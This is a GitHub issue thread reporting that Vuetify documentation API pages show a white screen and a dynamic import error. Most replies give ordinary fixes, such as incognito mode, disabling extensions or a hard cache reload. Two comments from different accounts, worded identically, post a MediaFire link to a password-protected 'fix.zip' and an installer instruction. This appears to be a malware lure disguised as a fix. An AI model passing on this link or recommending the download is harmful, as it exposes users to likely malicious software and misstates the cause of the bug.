### ISSUE TITLE
[Documentation] All of the API pages from the Vuetify documentation don't work.

### ISSUE THREAD

**Issue by AnatolyRrr** [vuetifyjs/vuetify#20393]
### Environment

**Browsers:** Chrome 127.0.0.0
**OS:** Windows 10

### Steps to reproduce
Go to any page from the API tab. For example, https://vuetifyjs.com/en/api/use-date/

### Expected Behavior
The page has loaded

### Actual Behavior
The page didn't load. White screen and an error in the console:
‘Dynamic import error, reloading page did not fix it TypeError: Failed to fetch dynamically imported module: https://vuetifyjs.com/assets/_name_-Hy9gfm8O.js’, main.ts:141

### Reproduction Link
[https://vuetifyjs.com/en/api/use-date/](https://vuetifyjs.com/en/api/use-date/)

### Other comments
The problem is over two weeks old.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pano9000** [comment]
this seems to be working for me, no issues that I can see.
Did you try with another browser/private tab/force refresh of the cache?

**Comment by AnatolyRrr** [comment]
> this seems to be working for me, no issues that I can see. Did you try with another browser/private tab/force refresh of the cache?

Just managed to open the page in Google Chrome in the incognito tab, I'll use it that way for now. Earlier I tried clearing cache, tried different browsers, enabled VPN, disabled IPv6, nothing helped.

**Comment by pano9000** [comment]
could it be some sort of browser plugin/addon/extension that may be causing this?
These are usually disabled, when running an incognito tab.

**Comment by IvaschenkoAA** [comment]
I had the same problem. Disable ad blocker or other plugins to restore functionality.

**Comment by nawi-harta** [comment]
Click reload [empty cache and hard reload] on chrome version 139.0.7246.0 (Official Build) dev (64-bit) works for me. Documentation works fine afterwards.
